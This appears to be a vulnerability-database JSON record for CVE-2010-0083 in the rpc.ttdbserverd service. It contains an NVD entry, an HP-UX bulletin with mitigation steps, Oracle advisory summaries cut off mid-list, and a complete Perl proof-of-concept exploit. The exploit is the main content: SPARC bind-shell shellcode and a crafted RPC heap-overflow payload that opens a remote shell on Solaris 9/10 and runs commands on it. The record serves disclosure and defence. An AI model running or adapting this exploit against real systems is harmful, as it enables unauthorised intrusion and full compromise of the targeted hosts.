{"cve": [{"lastseen": "2020-10-03T11:57:21", "description": "Unspecified vulnerability in Oracle OpenSolaris 8, 9, and 10 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.", "edition": 3, "cvss3": {}, "published": "2010-07-13T22:30:00", "title": "CVE-2010-0083", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0083"], "modified": "2012-10-23T03:17:00", "cpe": ["cpe:/o:oracle:opensolaris:9", "cpe:/o:oracle:opensolaris:8", "cpe:/o:oracle:opensolaris:10"], "id": "CVE-2010-0083", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0083", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:oracle:opensolaris:8:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:opensolaris:9:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:opensolaris:10:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:24:37", "description": "", "published": "2010-08-17T00:00:00", "type": "packetstorm", "title": "rpc.ttdbserverd SPARC Proof Of Concept Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0083"], "modified": "2010-08-17T00:00:00", "id": "PACKETSTORM:92792", "href": "https://packetstormsecurity.com/files/92792/rpc.ttdbserverd-SPARC-Proof-Of-Concept-Exploit.html", "sourceData": "`########################################################################## \n# Check Point Software Technologies - Vulnerability Discovery Team (VDT) # \n# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com> # 
\n# # \n# RPC TTDB .rec parser Heap Overflow # \n# # \n# thr_jmp_table does not exist on Solaris 10 u8 so use the -a # \n# option to specify the address of the saved window or other structures # \n# to overwrite # \n########################################################################## \n \nuse POSIX; \nuse IO::Socket; \nuse IO::Select; \nuse Getopt::Std; \n \n$shellrise = \n\"\\xa0\\x23\\xa0\\x10\".# /* sub %sp, 16, %l0 */ \n\"\\xae\\x23\\x80\\x10\".# /* sub %sp, %l0, %l7 */ \n\"\\xee\\x23\\xbf\\xec\".# /* st %l7, [%sp - 20] */ \n\"\\x82\\x05\\xe0\\xd6\".# /* add %l7, 214, %g1 */ \n\"\\x90\\x25\\xe0\\x0e\".# /* sub %l7, 14, %o0 */ \n\"\\x92\\x25\\xe0\\x0e\".# /* sub %l7, 14, %o1 */ \n\"\\x94\\x1c\\x40\\x11\".# /* xor %l1, %l1, %o2 */ \n\"\\x96\\x1c\\x40\\x11\".# /* xor %l1, %l1, %o3 */ \n\"\\x98\\x25\\xe0\\x0f\".# /* sub %l7, 15, %o4 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\xa4\\x1a\\x80\\x08\".# /* xor %o2, %o0, %l2 */ \n\"\\xd2\\x33\\xbf\\xf0\".# /* sth %o1, [%sp - 16] */ \n\"\\xac\\x10\\x27\\xd1\".# /* mov 2001, %l6 */ \n\"\\xec\\x33\\xbf\\xf2\".# /* sth %l6, [%sp - 14] */ \n\"\\xc0\\x23\\xbf\\xf4\".# /* st %g0, [%sp - 12] */ \n\"\\x82\\x05\\xe0\\xd8\".# /* add %l7, 216, %g1 */ \n\"\\x90\\x1a\\xc0\\x12\".# /* xor %o3, %l2, %o0 */ \n\"\\x92\\x1a\\xc0\\x10\".# /* xor %o3, %l0, %o1 */ \n\"\\x94\\x1a\\xc0\\x17\".# /* xor %o3, %l7, %o2 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x82\\x05\\xe0\\xd9\".# /* add %l7, 217, %g1 */ \n\"\\x90\\x1a\\xc0\\x12\".# /* xor %o3, %l2, %o0 */ \n\"\\x92\\x25\\xe0\\x0b\".# /* sub %l7, 11, %o1 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x82\\x05\\xe0\\xda\".# /* add %l7, 218, %g1 */ \n\"\\x90\\x1a\\xc0\\x12\".# /* xor %o3, %l2, %o0 */ \n\"\\x92\\x1a\\xc0\\x10\".# /* xor %o3, %l0, %o1 */ \n\"\\x94\\x23\\xa0\\x14\".# /* sub %sp, 20, %o2 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\xa6\\x1a\\xc0\\x08\".# /* xor %o3, %o0, %l3 */ \n\"\\x82\\x05\\xe0\\x2e\".# /* add %l7, 46, %g1 */ 
\n\"\\x90\\x1a\\xc0\\x13\".# /* xor %o3, %l3, %o0 */ \n\"\\x92\\x25\\xe0\\x07\".# /* sub %l7, 7, %o1 */ \n\"\\x94\\x1b\\x80\\x0e\".# /* xor %sp, %sp, %o2 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x90\\x1a\\xc0\\x13\".# /* xor %o3, %l3, %o0 */ \n\"\\x92\\x25\\xe0\\x07\".# /* sub %l7, 7, %o1 */ \n\"\\x94\\x02\\xe0\\x01\".# /* add %o3, 1, %o2 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x90\\x1a\\xc0\\x13\".# /* xor %o3, %l3, %o0 */ \n\"\\x92\\x25\\xe0\\x07\".# /* sub %l7, 7, %o1 */ \n\"\\x94\\x02\\xe0\\x02\".# /* add %o3, 2, %o2 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x90\\x1b\\x80\\x0e\".# /* xor %sp, %sp, %o0 */ \n\"\\x82\\x02\\xe0\\x17\".# /* add %o3, 23, %g1 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x21\\x0b\\xd8\\x9a\".# /* sethi %hi(0x2f626800), %l0 */ \n\"\\xa0\\x14\\x21\\x6e\".# /* or %l0, 0x16e, %l0 ! 0x2f62696e */ \n\"\\x23\\x0b\\xdc\\xda\".# /* sethi %hi(0x2f736800), %l1 */ \n\"\\x90\\x23\\xa0\\x10\".# /* sub %sp, 16, %o0 */ \n\"\\x92\\x23\\xa0\\x08\".# /* sub %sp, 8, %o1 */ \n\"\\x94\\x1b\\x80\\x0e\".# /* xor %sp, %sp, %o2 */ \n\"\\xe0\\x3b\\xbf\\xf0\".# /* std %l0, [%sp - 16] */ \n\"\\xd0\\x23\\xbf\\xf8\".# /* st %o0, [%sp - 8] */ \n\"\\xc0\\x23\\xbf\\xfc\".# /* st %g0, [%sp - 4] */ \n\"\\x82\\x02\\xe0\\x3b\".# /* add %o3, 59, %g1 */ \n\"\\x91\\xd0\\x38\\x08\".# /* ta 0x8 */ \n\"\\x90\\x1b\\x80\\x0e\".# /* xor %sp, %sp, %o0 */ \n\"\\x82\\x02\\xe0\\x01\".# /* add %o3, 1, %g1 */ \n\"\\x91\\xd0\\x38\\x08\";# /* ta 0x8 */ \n \ngetopts('h:o:f:a:',\\%args); \n \nif(defined($args{'h'})){ $host = $args{'h'}; }else{ $host = \"localhost\"; } \nif(defined($args{'o'})){ $offset = $args{'o'}; }else{ $offset = 0; } \nif(defined($args{'f'})){ $file = $args{'f'}; }else{ $file = \"/tmp/owned\"; } \nif(defined($args{'a'})){ $addr = hex($args{'a'}); }else{ $addr = 0; } \n \nprint STDERR \"-= rpc.ttdbserverd .rec parser exploit for Solaris 9/10 SPARC =-\\n\"; \nprint STDERR \"-= Check Point Software Technologies - Vulnerability Discovery 
Team (VDT) =-\\n\"; \nprint STDERR \"-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\\n\\n\"; \nprint STDERR \" Usage: [-f] /file/name [-h] hostname [-o] offset [-a] addr\\n\"; \n \n$remote = 1; \n \nif($host =~ /localhost/){ \n \n$remote = 0; \n \nif(!$addr){ \n$addr = get_thr_addr(); \n} \n} \n \n$heap = $addr - 8; # Where to write \n$pheap = pack('l',$heap); \n$stck = 0x00087080 + $offset; # Shellcode Address \n$pstck = pack('l',$stck); \n$null = $heap + 0x300; # Poiting to null \n$pnull = pack('l',$null); \n \n \n$rpcdata = # rpc.ttdbserverd is_erase procedure call \n\"\\x80\\x00\\x00\\x98\\x19\\x38\\xba\\x51\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x02\\x00\\x01\\x86\\xf3\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x00\". \n\"\\x00\\x01\\x00\\x00\\x00\\x20\\x4b\\x3b\\x63\\x40\\x00\\x00\\x00\\x09\\x6c\\x6f\". \n\"\\x63\\x61\\x6c\\x68\\x6f\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \npack('N',length($file)) . \n$file. \n\"\\x00\\x00\\x00\\x00\\x00\". \n\"\\x20\\x00\" . \"a\" x ( 5 - (length($file) % 4)). \n\"\\x10\\x80\\x00\\x03\" x (( 7596 - length($shellrise))/4). \n\"\\x80\\x1c\\x40\\x11\" x 2 . $shellrise . \"\\x00\" x 593 . \n\"\\x00\\x00\\x00\\x00\\x00\\x04\\x35\\x36\\x37\\x38\". \n\"\\x00\\x00\\x00\\x00\\x00\\x04\\x39\\x40\\x41\\x42\\x00\\x00\\x00\\x00\\x00\\x04\". \n\"\\x43\\x44\\x45\\x46\\x00\\x00\\x00\\x00\\x00\\x04\\x47\\x48\\x49\\x50\\x00\\x00\". \n\"\\x00\\x00\\x00\\x04\\x51\\x52\\x53\\x54\\x00\\x00\\x00\\x04\\x55\\x56\\x57\\x58\"; \n \n$rec = \n\"\\x4E\\x65\\x74\\x49\\x53\\x41\\x4D\\x00\\x55\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x00\". \n\"\\x31\\x2E\\x31\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x04\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\". 
\n\"\\x00\\x00\\x00\\x03\\x00\\x1C\\x00\\x1C\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\". \n\"\\xFF\\xFF\\xFF\\xFF\\x00\\x01\". \n\"\\x78\" x 122 . \n\"\\x00\\x00\\x00\\x00\\x00\\x00\". \n\"\\x00\\x00\\x00\\x0f\". \n\"\\x00\\x00\". \n\"\\x00\\x00\\x00\\x00\". \n\"\\xff\\xff\\xff\\xf0\" x 21 . \n\"\\x00\\x00\\x00\\x00\". \n\"\\xff\\xff\\xff\\xff\". \n$pstck. \n\"\\x00\\x00\\x00\\x00\". \n\"\\xff\\xff\\xff\\xff\". \n\"\\xff\\xff\\xff\\xff\". \n$pnull. \n\"\\xff\\x00\\x00\\x00\". \n$pheap. \n\"\\x44\" x 3000; \n \nif(!$remote){ \n$file = $file . \".rec\"; \nopen(F,\">$file\") or die(\"Cant create $file!\"); \nprint STDERR \"[+] Creating file \" . $file . \"\\n\"; \nprint F $rec; \nclose(F); \nprint STDERR \"[+] Writing 0x\" . sprintf('%lx',$stck) . \" to 0x\" . sprintf('%lx', $heap + 8) . \"\\n\"; \n} \n \n$port = rpc_getport($host, 111, 100083, 1); \nif(!$port){ die (\"[-] TTDB not running on target!\\n\");} \n \nprint STDERR \"[+] TTDB running on port $port\\n\"; \n \n$sock = IO::Socket::INET->new(Proto=>\"tcp\", PeerHost=>$host,PeerPort=>$port) \nor die \"[-] Cant Connect!!\\n\"; \nprint STDERR \"[+] Sending stuff to TTDB ...\"; \n#<STDIN>; \nprint $sock $rpcdata; \nprint STDERR \"d0ne!\\n\"; \n \nclose($sock); \n \nprint STDERR \"[+] Wait a little!\\n\"; \nsleep(2); \n \n$sc = IO::Socket::INET->new(Proto=>\"tcp\", PeerHost=>$host,PeerPort=>2001,Type=>SOCK_STREAM,Reuse=>1) \nor die \"[*] No luck :(\\n\\n\"; \n \nprint \"[*] We got in =)\\n\"; \n \n$sc->autoflush(1); \n \nsleep(2); \n \nprint $sc \"echo;uname -a;id;echo\\n\"; \n \ndie \"cant fork: $!\" unless defined($pid = fork()); \n \nif ($pid){ \nwhile(defined ($line = <$sc>)){ \nprint STDOUT $line; \n} \nkill(\"TERM\", $pid); \n}else{ \nwhile(defined ($line = <STDIN>)) { \nprint $sc $line; \n} \n} \n \nclose($sc); \nprint \"Good bye!!\\n\"; \n \nsub rpc_getport { \nmy ($target_host, $target_port, $prog, $vers) = @_; \n \nmy $s 
= rpc_socket($target_host, $target_port); \n \nmy $portmap_req = \n \npack(\"L\", rand() * 0xffffffff) . # XID \n\"\\x00\\x00\\x00\\x00\". # Call \n\"\\x00\\x00\\x00\\x02\". # RPC Version \n\"\\x00\\x01\\x86\\xa0\". # Program Number (PORTMAP) \n\"\\x00\\x00\\x00\\x02\". # Program Version (2) \n\"\\x00\\x00\\x00\\x03\". # Procedure (getport) \n(\"\\x00\" x 16). # Credentials and Verifier \npack(\"N\", $prog) . \npack(\"N\", $vers). \npack(\"N\", 0x6). # Protocol: TCP \npack(\"N\", 0x00); # Port: 0 \n \nprint $s $portmap_req; \n \nmy $r = rpc_read($s); \nclose ($s); \n \nif (length($r) == 28){ \nmy $prog_port = unpack(\"N\",substr($r, 24, 4)); \nreturn($prog_port); \n} \n \nreturn undef; \n} \n \nsub rpc_socket { \nmy ($target_host, $target_port) = @_; \nmy $s = IO::Socket::INET->new \n( \nPeerAddr => $target_host, \nPeerPort => $target_port, \nProto => \"udp\", \nType => SOCK_DGRAM \n); \n \nif (! $s){ \nprint \"\\nError: could not create socket to target: $!\\n\"; \nexit(0); \n} \n \nselect($s); $|++; \nselect(STDOUT); $|++; \nnonblock($s); \nreturn($s); \n} \n \nsub rpc_read { \nmy ($s) = @_; \nmy $sel = IO::Select->new($s); \nmy $res; \nmy @fds = $sel->can_read(4); \nforeach (@fds) { $res .= <$s>; } \nreturn $res; \n} \n \nsub nonblock { \nmy ($fd) = @_; \nmy $flags = fcntl($fd, F_GETFL,0); \nfcntl($fd, F_SETFL, $flags|O_NONBLOCK); \n} \n \nsub hexdump \n{ \nmy ($buf) = @_; \nmy ($p, $c, $pc, $str); \nmy ($i); \n \nfor ($i=0;$i<length($buf);$i++){ \n$p = substr($buf, $i, 1); \n$c = ord ($p); \nprintf \"%.2x \", $c; \n$pc++; \nif (($c > 31) && ($c < 127)){ \n$str .= $p; \n}else{ \n$str .= \".\"; \n} \nif ($pc == 16){ \nprint \" $str\\n\"; \nundef $str; \n$pc = 0; \n} \n} \nprint \" \" x (16 - $pc); \nprint \" $str \\n\"; \n} \n \nsub get_thr_addr { \n \n$cmd = `/usr/ccs/bin/dump -t /lib/ld.so.1 | grep thr_jmp_table`; \n($xx,$thr) = split(/ /,$cmd); \n \nif(!$thr){ \ndie(\"thr_jmp_table not found!\\n\"); \n} \n \n$cmd2 = `/bin/pmap $$ | grep /lib/ld.so.1`; 
\n($base,$yy) = split(/ /,$cmd2); \n \nif(!$base){ \ndie(\"error geting base addr\\n\"); \n} \n \n$base = hex($base); \n$thr = hex($thr); \n \nprint STDERR \"[+] Base at: 0x\" . sprintf('%lx',$base) . \"\\n\"; \nprint STDERR \"[+] thr_jmp_table at: 0x\" . sprintf('%lx',$thr) . \"\\n\"; \n \nreturn $base + $thr; \n \n} \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/92792/final_sparc.pl.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-0083"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02288473\r\nVersion: 1\r\n\r\nHPSBUX02556 SSRT100014 rev.1 - HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-07-13\r\nLast Updated: 2010-07-13\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP-UX running rpc.ttdbserver. 
The vulnerability\r\ncould be exploited remotely to execute arbitrary code.\r\n\r\nReferences: CVE-2010-0083\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP-UX B.11.11, B.11.23, B.11.31 running rpc.ttdbserver\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2010-0083 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nThe vulnerability can be resolved by disabling rtp.ttdbserver.\r\n\r\nNote: The rpc.ttdbserver process is not needed for programs provided in the HP CDE product.\r\n\r\nTo Disable rpc.ttdbserver\r\n\r\nEdit /etc/inetd.conf and comment out the rpc.ttdbserver line as follows:\r\n#rpc stream tcp swait root /usr/dt/bin/rpc.ttdbserver ...\r\n\r\nRestart inetd:\r\n/usr/sbin/inetd -c\r\n\r\nKill any instances of rpc.ttdbserver that might be running.\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nDisable rpc.ttdbserver\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security\r\nPatch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a\r\nspecific HP-UX system. It can also download patches and create a depot automatically. 
For more information\r\nsee: https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS\r\n\r\nHP-UX B.11.11\r\nHP-UX B.11.23\r\nHP-UX B.11.31\r\n==================\r\nCDE.CDE-TT\r\naction: disable rpc.ttdbserver\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nHISTORY\r\nVersion:1 (rev.1) 13 July 2010 Initial release\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP\r\nsoftware products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP,\r\nespecially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software 
Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is\r\ncontinually reviewing and enhancing the security features of software products to provide customers with\r\ncurrent secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that all\r\nusers determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user situations\r\nand, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the\r\ninformation provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability and fitness for a particular purpose, title\r\nand non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein.\r\nThe information provided is provided "as is" without warranty of any kind. 
To the extent permitted by law,\r\nneither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of substitute\r\nproducts or services; or damages for loss of data, or software restoration. The information in this document\r\nis subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products\r\nreferenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other\r\nproduct and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAkw80fwACgkQ4B86/C0qfVlvXwCgnfePfI7ZTR9IjEAp1R+fJmjp\r\nwPAAnRHpaFTkEIUDJI8KP9YXp3TcE/vr\r\n=TzV6\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-07-18T00:00:00", "published": "2010-07-18T00:00:00", "id": "SECURITYVULNS:DOC:24274", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24274", "title": "[security bulletin] HPSBUX02556 SSRT100014 rev.1 - HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-1129", "CVE-2010-1968", "CVE-2010-1965", "CVE-2010-1966", "CVE-2009-0696", "CVE-2010-2703", "CVE-2010-1973", "CVE-2010-0001", "CVE-2007-2452", "CVE-2010-1967", "CVE-2010-1969", "CVE-2010-1970", "CVE-2007-5497", "CVE-2009-0692", "CVE-2008-5110", "CVE-2010-1972", "CVE-2010-0083", "CVE-2009-1427", "CVE-2010-1971", "CVE-2010-2704"], "description": ">20 vulnerabilities in different applications are fixed.", "edition": 1, "modified": "2010-07-22T00:00:00", "published": "2010-07-22T00:00:00", "id": "SECURITYVULNS:VULN:11009", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:VULN:11009", "title": "Hewlett Packard applications multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-2374", "CVE-2010-0903", "CVE-2010-0892", "CVE-2010-2386", "CVE-2010-0873", "CVE-2010-0913", "CVE-2010-0907", "CVE-2010-0906", "CVE-2010-2384", "CVE-2010-2379", "CVE-2009-0217", "CVE-2010-0902", "CVE-2010-2377", "CVE-2009-3762", "CVE-2010-2376", "CVE-2010-2372", "CVE-2010-0908", "CVE-2008-4247", "CVE-2010-0914", "CVE-2010-2385", "CVE-2010-2397", "CVE-2010-0081", "CVE-2010-2393", "CVE-2010-0898", "CVE-2010-2378", "CVE-2010-2401", "CVE-2010-0900", "CVE-2010-2398", "CVE-2009-3555", "CVE-2010-0912", "CVE-2010-0835", "CVE-2010-0915", "CVE-2009-3764", "CVE-2010-0910", "CVE-2010-0849", "CVE-2010-2381", "CVE-2010-2371", "CVE-2010-2394", "CVE-2010-2380", "CVE-2010-2403", "CVE-2010-0911", "CVE-2010-2392", "CVE-2010-0916", "CVE-2010-2383", "CVE-2010-2370", "CVE-2010-0904", "CVE-2010-2375", "CVE-2010-0909", "CVE-2010-2382", "CVE-2010-0899", "CVE-2010-0083", "CVE-2010-0905", "CVE-2010-2402", "CVE-2010-2400", "CVE-2010-0836", "CVE-2009-3763", "CVE-2010-2399", "CVE-2010-2373", "CVE-2010-0901"], "description": "Quarterly update fixed 59 different vulnerabilities.", "edition": 1, "modified": "2010-07-20T00:00:00", "published": "2010-07-20T00:00:00", "id": "SECURITYVULNS:VULN:10999", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10999", "title": "Oracle / Sun applications multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-2374", "CVE-2010-0903", "CVE-2010-0892", "CVE-2010-2386", "CVE-2010-0873", "CVE-2010-0913", "CVE-2010-0907", 
"CVE-2010-0906", "CVE-2010-0088", "CVE-2010-2384", "CVE-2010-2379", "CVE-2009-0217", "CVE-2010-0085", "CVE-2010-0902", "CVE-2010-0087", "CVE-2010-2377", "CVE-2009-3762", "CVE-2010-2376", "CVE-2010-2372", "CVE-2010-0908", "CVE-2010-0092", "CVE-2008-4247", "CVE-2010-0848", "CVE-2010-0914", "CVE-2010-2385", "CVE-2010-0838", "CVE-2010-0840", "CVE-2010-0095", "CVE-2010-2397", "CVE-2010-0839", "CVE-2010-0094", "CVE-2010-0081", "CVE-2010-2393", "CVE-2010-0898", "CVE-2010-0847", "CVE-2010-2378", "CVE-2010-2401", "CVE-2010-0842", "CVE-2010-0900", "CVE-2010-2398", "CVE-2009-3555", "CVE-2010-0841", "CVE-2010-0844", "CVE-2010-0846", "CVE-2010-0912", "CVE-2010-0837", "CVE-2010-0835", "CVE-2010-0915", "CVE-2009-3764", "CVE-2010-0910", "CVE-2010-0849", "CVE-2010-2381", "CVE-2010-2371", "CVE-2010-2394", "CVE-2010-0091", "CVE-2010-2380", "CVE-2010-2403", "CVE-2010-0911", "CVE-2010-2392", "CVE-2010-0916", "CVE-2010-2383", "CVE-2010-2370", "CVE-2010-0904", "CVE-2010-2375", "CVE-2010-0909", "CVE-2010-2382", "CVE-2010-0899", "CVE-2010-0083", "CVE-2010-0905", "CVE-2010-2402", "CVE-2010-2400", "CVE-2010-0836", "CVE-2010-0843", "CVE-2009-3763", "CVE-2010-2399", "CVE-2010-0084", "CVE-2010-2373", "CVE-2010-0901"], "description": "Oracle Critical Patch Update Advisory - July 2010\r\nDescription\r\n\r\nA Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. 
Please refer to:\r\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\r\n\r\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible. This Critical Patch Update contains 59 new security fixes across all product families listed below.\r\n\r\nOracle is in the process of aligning the Sun Microsystems policies with Oracle Software Security Assurance policies and procedures. For details, please refer to Changes in security policies for the Sun product lines.\r\nAffected Products and Components\r\n\r\nSecurity vulnerabilities addressed by this Critical Patch Update affect the products listed in the categories below. The product area of the patches for the listed versions is shown in [square brackets] following the product versions. Please click on the link in [square brackets] or in the Patch Availability Table to access the documentation for those patches.\r\n\r\nAffected product releases and versions that are in Premier Support or Extended Support, under the Oracle Lifetime Support Policy:\r\n\r\n\u2022 Oracle Database 11g Release 2, version 11.2.0.1 \t [ Database ]\r\n\u2022 Oracle Database 11g Release 1, version 11.1.0.7 \t [ Database ]\r\n\u2022 Oracle Database 10g Release 2, versions 10.2.0.3, 10.2.0.4 \t [ Database ]\r\n\u2022 Oracle Database 10g, version 10.1.0.5 \t [ Database ]\r\n\u2022 Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV \t [ Database ]\r\n\u2022 Oracle TimesTen In-Memory Database, versions 7.0.6.0, 11.2.1.4.1 \t [ Database ]\r\n\u2022 Oracle Secure Backup version 10.3.0.1 \t [ Database ]\r\n\u2022 Oracle Application Server, 10gR2, version 10.1.2.3.0 \t [ Fusion Middleware ]\r\n\u2022 Oracle Identity Management 10g, version 10.1.4.0.1 \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 11gR1 releases (10.3.1, 10.3.2 and 10.3.3) \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 10gR3 release (10.3.0) \t [ Fusion 
